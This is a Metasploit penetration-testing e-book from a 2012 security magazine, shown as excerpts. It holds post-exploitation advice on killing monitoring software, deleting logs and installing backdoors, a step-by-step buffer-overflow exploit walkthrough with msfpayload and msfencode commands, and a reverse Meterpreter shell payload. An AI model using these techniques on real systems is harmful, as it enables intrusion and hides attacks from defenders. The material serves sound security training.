Metasploit Framework, Guide for Pentesters.

Metasploit Framework - guide forpentesters

ii

Copyright © 2012 Software Media Sp. z o.o. SK

Editor in Chief: Ewa [email protected]

Managing Editor: Aleksandra [email protected]

DTP: Andrzej Kuca, Lalit Agarwal, Aleksandra Cacko

Art Director: Andrzej [email protected]

Graphics and cover: Ireneusz Pogroszewski

Proofreaders: Edward Werzyn, Gareth Watters

Top Betatesters: Stefanus Natahusada, Steven Wierckx

Special Thanks to the Beta testers and Proofreaderswho helped us with this issue.Without their assistance there would not be a PenTest e-book.

Senior Consultant/Publisher: Pawel Marciniak

Production Director: Andrzej Kuca

Publisher: Software Media02-682 Warszawa, ul. Bokserska 1

http://pentestmag.com/

First editionIssue 2/2012 (2) ISSN 2084-1116

Whilst every effort has been made to ensure the high qualityof the e-book, the editors make no warranty, express or implied,concerning the results of content usage.

All trademarks presented in the magazine were used onlyfor informative purposes.

All rights to trade marks presented in the magazineare reserved by the companies which own them.

DISCLAIMER!

The techniques described in our articles may only be used in private,local networks. The editors hold no responsibility for misuseof the presented techniques or consequent data loss.


iv

Contents

1 Metasploit: An Introduction 1

What is Metasploit? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1

Architecture of Metasploit: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

Platform Used for demonstration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

Metasploit Interfaces: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

Good Practices for using Metasploit: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

Updating via Msfupdate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

Port scanning via Nmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

Meterpreter: Metasploit’s Payload . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

What typically payloads allow you to do after execution of exploit? . . . . . . . . . . . . . . . . . . . . . . . . . 4

What is a meterpreter? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

What makes Meterpreter so powerful? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

How this is achieved? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

How this is helpful to pentesters’? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

Running Metasploit: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

Methodology for running an exploit from msfconsole commands: . . . . . . . . . . . . . . . . . . . . . . . . . 6

Msfencode: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

Example: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8

How does it help the pentester? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8

Automating the Pentest . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8

Using db_autopwn . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

Auxiliary Module system: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

Popular Auxillary Modules: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

Searching Auxiliary modules: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

How it is helpful to pentesters? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

Social Engineer Toolkit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

How this is helpful to pentesters’? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11

General Precautions for using Metasploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12

Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12


v

2 Metasploit Fu post exploitation 14

Post exploitation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14

Let’s Fu . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14

Migration to process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14

Killing monitoring software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15

Deleting Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15

Victim information gathering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

Privilege escalation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20

Backdooring or installation of rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21

Victim pivoting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23

Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

3 Hacking exploit module for metasploit. Bend Metasploit to your will. . . 25

Step 1 - where is the vulnerability? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25

Enough analysis, where’s the exploit!? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27

A closer look at the vulnerability. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27

Find out what the address should be under normal execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30

Find the exact location in the attack string that corrupts the address in the stack . . . . . . . . . . . . . . . . . . 31

Fix the attack string . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32

First shellcode. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34

Deliver a payload. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35

All wrapped up in a nice little module. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38

Add the exploit code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40

Test the exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40

Power of the framework. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41

Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42

4 Playing with smb and authentication. . . ;) 43

My point of view . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

Beginning the attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

Real life . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49

Defense and logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51

5 Advance Meterpreter with API, Mixins and Railgun 53

Meterpreter API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53

Meterpreter Mixins . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54

RailGun- Converting Ruby into a weapon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55


vi

6 The Inside-Outsider - Leveraging Web Application Vulnerabilities + Metasploit to become the Ultimate Insider 59

Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59

The First Incursion – The Web App . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59

The tunnel to the inside . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61

The Path to Gold! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62

Useful commands – meterpreter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62

Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66

7 Metasploit for penetration testing 68

Working with metasploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68

Metasploit Interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69

Metasploit Utilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69

MSFpayload . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69

MSFencode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70

Nasm Shell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70

Exploitation from basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70

Pentesting with metasploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71

Metasploit. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71

Step 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71

Step 2: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72

Step 3: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72

Step 4: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73

Step 5: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74

Step 6: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74

Step 7: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75

Step 8: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76

Step 9: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76

COMMANDS RECALL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77


1 / 78

Chapter 1

Metasploit: An Introduction

What is Metasploit?

Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. It provides end toend framework for penetration testing for:

• Information gathering

• Vulnerability Scanning

• Pre Exploitation

• Post Exploitation

• Exploit Development

Metasploit greatest advantage is that it is open source and freely extendable. You can customize it by including your exploitand payloads as per your need. A security pentester can check the custom made applications specific to an enterprise against hiscustomized exploits and payloads. If a security researcher crafts a new attack, then a custom made payload can carry out most ofthe attack purpose.

Today, software vulnerability advisories are often accompanied by a third party Metasploit exploit module that highlights theexploitability, risk, and remediation of that particular bug


14 / 78

Chapter 2

Metasploit Fu post exploitation

People always emphasize on breaking into the system or the exploitation part. We are into a system, what should be the donefurther? Post exploitation is rarely talked about which is as important as getting in. This article will mostly focus on somenecessities and possibilities post exploitation of a system.

Post exploitation

After putting in efforts for successful exploitation of a system, let’s look at some of the options that become available for apentester or security auditor. The options can be broadly divided into necessary and possible. Performing all of these actionsassume you already have a meterpreter shell of the victim machine.

Necessary – These should always be done in order to stay stealthy and not get detected or caught.

• migrate to another process,

• killing monitoring software,

• deleting Logs.

Possible – These can be done to get a deep insight into the system or the network broken-in. Use of these techniques can allowus to maintain access to the system and get access to more systems in the network infrastructure.

• understanding, gaining and collecting as much information about the victim,

• privilege escalation,

• backdooring or installation of rootkits,

• using victim as a pivot.

Let’s Fu

Migration to process

For breaking into the system, vulnerability in some software is exploited and the payload (in this case the meterpreter) is executedin the memory space of the process/software being exploited. As unexpected data is sent to the process for exploitation, theprocess might eventually crash and exit. If the process closes, our meterpreter shell will also be lost as the memory space of theprocess will be destroyed when it exits.

First step on successful exploitation should be migrating our payload to another process’s memory so that even if the exploitedprocess crashes, the shell is still retained. In order to do this you can run ps to get a list of processes with their PIDs and then usethe migrate command to migrate the payload to another process.


25 / 78

Chapter 3

Hacking exploit module for metasploit. Bend Metas-ploit to your will. . .

Most articles on Metasploit cover what it is, what it does and how to use it. Essentially you can find out how to scan for vulnerablesystems followed by how to select, configure and deploy an exploit against a vulnerable system. These are indispensable skillsto anyone who wishes to use the framework in any capacity. The purpose of this article is to give those interested an insightinto how to extend Metasploit to suit their own specific needs. This extensibility is where Metasploit is leagues ahead of thecompeting frameworks currently available.

The Metasploit framework is Open Source which allows anyone to change the framework in whatever way they see fit. This maybe as simple as adding debug strings to existing exploit modules right up to creating a brand new exploit module for a specificexploit. Penetration testing is not an exact science and good testers are required to adapt to specific situations on a daily basis.For example, exploits may not work "out-of-the-box" and require investigation, debugging and possibly customisation of exploitsto successfully compromise the target systems. Closed source commercial toolkits leave their users at the mercy of the qualityof the exploits that are shipped with their frameworks; an exploit will either work or not and there is nothing the tester can do toadapt to these situations using commercial tools. Metasploit places this power back into the hands of those willing to take it.

This article is not about going through what Metasploit is, or how to use the framework; its purpose is to give those looking to getmore out of Metasploit a start into how they can extend the framework for their own needs. To illustrate this process this articlewill cover not only what’s required to create an exploit module for the framework but will cover the entire process of creating acustom exploit for a vulnerability in a piece of software, right through to creating a custom module for the Metasploit framework.

The exploit development process will discuss the following tools:

• IDA – Interactive Disassembler

• OllyDbg – Open source debugger for windows

• pattern_create.rb - Used to create a string where no substring appears more than once in the string. More details on this laterin the article

• pattern_offset.rb - Used to find the offset of a substring within the pattern created using the above tool

• Metasploit – Needs no introduction; open source penetration testing framework

There is enough to both IDA, OllyDbg and reverse engineering techniques to warrant a series of articles. For the purposes of thisarticle only the required features and concepts will be presented.

Step 1 - where is the vulnerability?

In order to examine the process a vulnerable application is required. In 2011 the U.K. Government Communications Headquarters(GCHQ) released a challenge as part of a recruitment drive. Part 3 of that challenge was a key generation challenge. In order to


26 / 78

solve the challenge a license.txt file had to be created which would generate a URL. The details of this challenge are well beyondthe scope of this article, but for those interested please visit: http://www.canyoucrackit.co.uk.

(At the time of writing this file is still available at: http://www.canyoucrackit.co.uk/da75370fe15c4148bd4ceec861fbdaa5.exe)

The interesting aspect of this file is that it is vulnerable to a simple buffer-overflow vulnerability; making it perfect to use fordemonstration purposes. Running the application presents the user with the following:

Based on the returned message the program requires a hostname in order to function properly. Trying with www.google.com forthe hostname gives the following message:

The application now requires a license.txt file. Creating an arbitrary license.txt file returns the following message:

This message gives very little away. In order to proceed, the application must be reverse engineered to find out what the validlicense.txt format must be. The loading routine of keygen.exe can be examined in IDA.

This screenshot shows where in the keygen.exe binary the ‘license.txt’ file is opened. First the string license.txt is loaded ontothe stack and then the API _fopen64 is called:

If the file is successfully opened, the following code attempts to read one line from the file using the API fscanf, highlighted inthe image below. The next thing the code does is check to see if the line of text read from the file begins with the string ‘gchq’:

http://www.canyoucrackit.co.uk

http://www.canyoucrackit.co.uk/da75370fe15c4148bd4ceec861fbdaa5.exe


27 / 78

If those conditions have been satisfied, keygen.exe then uses the crypt API to encrypt the next 8 bytes using 56-bit DES. Theresult of this encryption operation is taken and is compared to: hqDTK7b8K2rvw.

The idea behind this part of the challenge was to see if the plaintext used to create hqDTK7b8K2rvw. A decent password crackingutility will recover the plaintext quite quickly. The plaintext is: ‘cyberwin’.

Based on the analysis, the string in the license.txt file must take the following format: ‘gchqcyberwin[license_data]’ where[license_data] will be used by keygen.exe to construct a URL. Constructing the correct URL solves the challenge.

Enough analysis, where’s the exploit!?

Take another look at the piece of code that loads the line from the license.txt file:

You may have noticed that there is a buffer overflow in the code used to load in the contents of the license.txt file. At this pointthe discussion will move away from the GCHQ challenge and back to exploit development and the Metasploit framework. Therest of the article will focus on the buffer overflow above and what’s involved in exploiting it.

A closer look at the vulnerability. . .

The code that loads the line from the file can be broken down into two components. First it creates memory on the stack to holdthe information from the file; secondly it reads the data suing the fscanf call.

This is the code that creates enough room on the stack to read 24 bytes from the file:


28 / 78

This is followed by the fscanf call. Fscanf will read a string from a file until it hits a null-terminator ‘\0’ or a new-line typecharacter. As there is no bounds, checking a line longer than 24 bytes will exceed the buffer size and result in unpredictablebehaviour from the program. Here’s the output from loading a license.txt file containing:

‘gchqcyberwinHACKIN9HACKIN9HACKIN9HACKIN9HACKIN9HACKIN9HACKIN9HACKIN9!!!’

Corrupted stack? Although the string is only slightly longer than the allocated buffer the integrity of the stack has been corruptedby user supplied input causing the application to crash. Excellent, user supplied input has corrupted the stack, is it now possibleto gain control over execution?

I want my E.I.P.

It’s now time to use a debugger to find out exactly what is going on internally when the contents of the malicious license.txt fileare loaded. Open the file in OllyDbg and go to address 0x401150 within the file. This is where the fscanf API is located. Createa breakpoint at this address (Press F2) to suspend execution when the program reaches that point during execution:

After creating the breakpoint execute the program (Press F9). The important part of the output at this point is the stack:


29 / 78

The stack is in a typical state right before a function call. Notice the highlighted item above. This is a return address that will beused by the program when it exits out of a function and the program executes a RETN instruction. When the RETN instructionis encountered the CPU will load the next DWORD on the stack into the instruction pointer (EIP) and execution will continuefrom that point. Step over (Press F2) the fscanf call to see what happens when the program loads in the data from the license.txtfile:

Comparing the two previous screenshots shows that data in the license.txt file has overwritten a location on the stack that origi-nally stored a return address. Continue execution until the end of the function to the next RETN instruction to see if the contentsof the license string can be used to overwrite the EIP. The address of the return instruction is 0x401208. Create a breakpoint andlet the program run to this point (Press F9):


30 / 78

Unfortunately, the execution never reaches the RETN instruction as the program encounters an ‘Access Violation’ Error:

It seems that the contents of the license file have corrupted execution in an unexpected way. Restart the program (CTRL+F2) andfind out where the program is failing. Stepping through the program in the debugger reveals the cause of the issue:

The address on the stack at location: 0x22CCD4 has been corrupted by part of the attack string. As a result the programterminates before we can gain control over execution. The DWORD at address 0x22CCD4 contains bytes from our attack string:

The following code within keygen.exe uses the address it reads off the stack, to reference another part of the program:

As this reference points to an unknown address (0x00212121) in the program, it results in the access violation shown earlier.

To fix this, two details must be known:

1. What the address should be under normal execution

2. The exact location in the attack string that corrupts the address in the stack

Find out what the address should be under normal execution

To find out what the address should be add a breakpoint at 0x4011F1. As shown here:


31 / 78

Change the license.txt file so that the string is no longer than 24 bytes. This will prevent corrupting the stack. Execute theprogram to the breakpoint at address 0x4011F1 that was created in the previous step.

Viewing the data on the stack at address 0x22CCD4 now shows what the contents of the corrupted region of the stack should beunder normal operations. In this case the DWORD 0x104383F8 should be on the stack:

Note: If you are following along, the exact address may be different so make sure you check all the details!

The attack string will need to preserve this information to ensure the program operates correctly when processing the maliciouspayload. The correct contents are known but the location in the attack string is not yet clear. The next section will discuss theMetasploit of finding particular locations within attack strings.

Find the exact location in the attack string that corrupts the address in the stack

The Metasploit framework provides two extremely useful tools which help in finding the exact location in the attack string thatoverwrite particular locations in memory. These are:

• pattern_create.rb

• pattern_offset.rb

Pattern_create.rb creates a string where two or more characters are not repeated anywhere else in the string. The followingscreenshot shows creating a pattern 1024 bytes in length, and then using pattern_offset.rb to find the exact offset of the characters:‘8Ab9’.


32 / 78

This can be used to find out critical locations in the attack string for this example. Create a license.txt file with the followingstring:

gchqcyberwinAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4A

Running the program shows that contents at address are overwritten by the string: 8Ab9 (highlighted in red above).

Using pattern_offset.rb can then be used to show that the offset of this location in the attack string is 56 bytes into the string:

Fix the attack string

Armed with this information the attack string can be repaired to prevent crashing the program before gaining control overexecution. Using a hex-editor replace the string 8Ab9 with the correct address obtained above:

The bytes are placed into the file in reverse order as the architecture is little-endian. Running the program again now shows thefollowing:


33 / 78

As the highlight section shows the correct information is loaded at the correct location on the stack. The program no longercrashes and can run to the end of the function to the RETN instruction shown here:

This image also shows the stack. When a RETN instruction is encountered the CPU will pop the next DWORD, known as thereturn address, off the stack and load it into the instruction pointer (EIP). This is the key requirement in gaining control overexecution when exploiting buffer overflow vulnerabilities. The attack string must overwrite this information on the stack to alocation in memory that contains the shellcode.

In this case the part of the attack string that overwrites this key piece of information is: 0x41623641 or Ab6A. The exact locationof this string can be found using the technique described above.

If the RETN instruction is executed the program will attempt to continue execution from 0x41366241, as shown here:


34 / 78

As there is no code at this address the program will crash.

The attack string, which is under our control, is loaded onto the stack. In order to execute arbitrary code, all that is now requiredis loading shellcode onto the stack and redirecting execution to the shellcode located on the stack by overwriting the EIP asshown above. Reviewing the stack in OllyDbg choose a location nearer the end of the current attack string. For demonstrationpurposes 0x0022CD6C was chosen.

First shellcode. . .

To confirm execution is working change the shellcode to be a series of NOP (0x90) instructions followed by an INT3 (0xCC)instruction. The INT3 instruction is a trap to the debugger to halt execution. Make sure that changes to the attack string are madeafter the addresses used to fix the attack string in the earlier section. The next image shows the updated license file with the newEIP, NOP and INT3 instructions.

Running the keygen program as far as the RETN instruction shows that the return address is now 0x0022CD32, the location ofthe shellcode on the stack. This is illustrated here:


35 / 78

Stepping past the RETN instruction shows that the CPU now executes the NOP instructions as far as the INT3 instruction:

This has confirmed that gaining control over execution is possible by crafting the contents of the license.txt file.

Deliver a payload. . .

The next step is to have Metasploit generate some useful shellcode for use in the exploit. In order to do this the Metasploitframework provides yet another tool: msfpayload. This can be used to generate the shellcode for any payload that is available inthe Metasploit framework. Use msfpayload to search for a particular payload:

msfpayload -l | grep -i exec

Then use it to generate the shellcode:

msfpayload windows/exec CMD=calc.exe P


36 / 78

In its current format this payload will not work in our exploit. Earlier it was noted that fscanf will read one line of text. Specialcharacters like 0x0a, 0x0c, 0x0d, 0x20 will cause fscanf to stop reading the exploit code and break execution. FortunatelyMetasploit also assists with getting around this type of restriction. Msfpayload can be used in combination with msfencode andtell it not to use particular characters.

In this case, the following command will generate shellcode that will work with the fscanf API:

- msfpayload windows/exec CMD=calc.exe R | msfencode -b ’\x0a\x0c\x0d\x20‘

The output of this command is:

This is then added to the shellcode using the hex editor:


37 / 78

The next test is to test our exploit:

Great, it works! The maliciously crafted license.txt file can execute calc.exe!


38 / 78

All wrapped up in a nice little module. . .

Ok, at this stage all of the information required to create a working exploit is available. The next step is to abstract this exploitinto a Metasploit module in order to use it in the framework and benefit from all of the features the framework provides. Thebest way to find out how to create exploit is to review the existing exploit modules. In this case our module needs to create afile which will contain the exploit and payload. In order to create the module the foxit_title_bof.rb exploit module was used asa template. All of the exploit modules (on backtrack) are located in the folder: /opt/metasploit/msf3/modules/exploits. In thisdirectory the exploits are organised by operating system and then by software or type. As this is a fileformat type exploit for thewindows platform the new exploit module will be located in:

/opt/metasploit/msf3/modules/exploits/windows/fileformat

This is where the foxit_title_bof.rb module was taken from. All of the foxit specific functionality was stripped out to leave aminimal skeleton module:

This module has the bare minimum required to function as an exploit module: initialize and exploit. The initialize function setsup the exploit module and contains the information that is seen when the ‘info’ command is used against a module. It is alsoused to register options to allow configuration using msfconsole.

Most of the information above is for informational purposes only, for example: name, description, version, etc. however, the‘Payload’ section contains configuration options for the payload. In this case the ‘BadChars’ option is used to ensure thatMetasploit encodes the payload appropriately and does not use characters that will break the exploit. The does the same job asmsfencode did earlier in the article.

The exploit function is called when the ‘exploit’ command is issued. As the image shows this is currently empty and will not doanything in its current state.

Saving the module as it is in the location:


39 / 78

/opt/metasploit/msf3/modules/exploits/windows/fileformat/gchq_license_bof.rb

will ensure that it is loaded by the framework the next time the Metasploit is started. To confirm simply start msfconsole andissue the ‘search gchq’ command as shown here:

This module can now be configured in the same way as any other module in the framework, for example:

This looks good but the exploit module is not yet configured to do anything.


40 / 78

Add the exploit code

The last step is to tell the module what to do when the exploit command is issued. In this case coding the exploit function is verysimple:

First of the all the code creates a license stub. This is the same license stub that was used earlier in the hex editor.

Next, add the payload to the licence stub. This is achieved by simply using the Metasploit function ‘payload.encoded’. Thisfunction transparently generates and encodes the payload which is then appended to the stub as shown above.

Lastly the file_create function is used to write the newly created malicious file to the disk.

It really is as simple as that, in this case a working exploit module can be create using three commands. The framework makesexploit development so much easier.

Test the exploit

Load and configure the module as before and now issue the exploit command:

As shown here a file is create in /root/.msf4/local/license.txt The contents of the created file look like this:


41 / 78

Copy this file to the test system and run it through leygen.exe again.

As the screenshot shows the calc.exe is executed when keygen.exe opens the created license.txt file.

Power of the framework. . .

Now that the exploit module has been abstracted it’s time to use the framework to deploy a far more interesting payload thanshowing a calculator! For this purpose, the payload windows/meterpreter/reverse_tcp is used. Reconfigure the exploit modulelike so:

Start up a handler on the server (attacker’s) side:

exploit/multi/handler


42 / 78

Note: no handler was created in the module so it has to be manually started.

This time when the exploit is deployed a reverse Meterpreter shell is created which connects back the waiting Metasploit sessionon the attacker’s side:

This gives shell access to the victim’s system and the attacker’s job is complete! At this point the attacker can leverage the fullpower of the Metasploit framework on the victim’s system.

Conclusions

Hopefully this article has been able to convey just how much power the Metasploit framework places in your hands. Theframework is not simply limited to the quality of the content it ships with, for those willing to get their hands dirty any componentof the framework can be changed to suit a specific situation. The article covered creating a custom exploit and abstracting it intoits own module. The example used is a basic buffer overflow used but there are far more sophisticated exploit modules usingvarious techniques such as return-oriented-programming, written by some of the best minds in the industry. There is a wealth ofknowledge in the exploit database just waiting for the curious to explore.

This article is just the beginning of what’s possible with Metasploit, every single part of the Framework can be changed to suityour specific needs. Don’t be afraid of the internals of the framework; let your curiosity get the better of you and just dive in.

Note: Remember hacking in all its forms is illegal! So unless you have written permission to try an exploit against a system don’tdo it! The penalties are real and severe. Have fun and don’t be stupid!

AcknowledgmentsThanks to my wife Jean for putting up with me ignoring her to write this and all of my other endeavours and my brother Brianfor being kind enough to review it for me! Remember, winter is coming.

About the authorPatrick Fitzgerald works in Dublin, Ireland as an Information Security Consultant for Ward SolutionsLinkedIn: ie.linkedin.com/pub/patrick-fitzgerald/4/911/529Twitter: @misterfitzy


43 / 78

Chapter 4

Playing with smb and authentication. . . ;)

Ok folks, when you are reading this title you are thinking ’Hey, this stuff is old crap, it’s impossible who this attack are yetworking in native windows 2008 R2 Active Directory Domain. . . ’

But. . . You are wrong. This stuff still working in the state of the art infrastructure. And I want to show you. . .

My point of view

In my experience a lot of infrastructures have two big problems, they are using local admin credential with the same password insome or all systems of the network and maintain some servers (or clients) unpatched, with these two common mistakes we cancompletely Pown the infrastructure.

Two pillars of best practices are just patching and a different password for local admin for each host and it is possible to retrievea lot of best practices from the Internet and in many books about security architecture, but a lot of system admin don’t use them,why? In most case because the system admins are uneducated in security, or because they are lazy, or because they are too busy..

Beginning the attack

The first step is to find the vulnerable host, we can do this in a lot of manners, the ROE in the contract with your customers are thedriver, in some case we can use tools like nessus, if the noise is acceptable, otherwise the choice of old style hackers is to workwith nmap with a very small range of ports and with a long interval between one port and another, something like a paranoidscan on the nmap timing template.

In my test lab I have one host with installed windows 2k8 sp2 unpatched, this host is vulnerable, I will try to use an attack againstthe smb2, the exploit ms090 050, the exploit is stable enough, but in some cases can crash the target, for this reason be carefulin production environments. Before starting with the attacks we will review the test lab configurations, we have three windowshosts, two of them have installed windows server 2k8 R2 and one is with windows server 2k8 sp2, the two host 2k8R2 are on the2k8 Active Directory domain, the domain mode and the forest mode are windows 2k8, the host with windows server 2k8sp2 is aworkgroup server with file sharing enabled, look at this table:

DC2k8R2 - 192.168.254.201 - Domain Controller and DNS serverSRV2k8R2 - 192.168.254.202 - Member ServerSRV2k8sp2 - 192.168.254.204 - Stand Alone Server - File Sharing

We have also an attacking machine, in my case a Backtrack 5 R2 x64 with IP 192.168.254.1.

I like the Backtrack machine because is not necessary to install a lot of tools, it has the most popular and used tools directlyon-board.

I start the metasploit framework in my BT5R2 machine, normally I like to work with msfconsole because this is the mostinteractive from the environment of metasploit framework, but if you prefer the GUI, is possible to work with Armitage.

Now I configure the first exploit:


53 / 78

Chapter 5

Advance Meterpreter with API, Mixins and Rail-gun

